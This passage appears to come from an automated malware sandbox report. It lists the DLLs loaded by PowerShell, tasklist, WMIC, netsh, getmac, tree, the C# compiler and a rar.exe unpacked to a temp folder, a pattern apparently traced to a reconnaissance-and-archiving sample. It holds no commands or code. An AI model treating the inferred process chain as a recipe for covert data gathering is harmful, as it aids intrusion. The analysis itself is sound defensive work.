Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
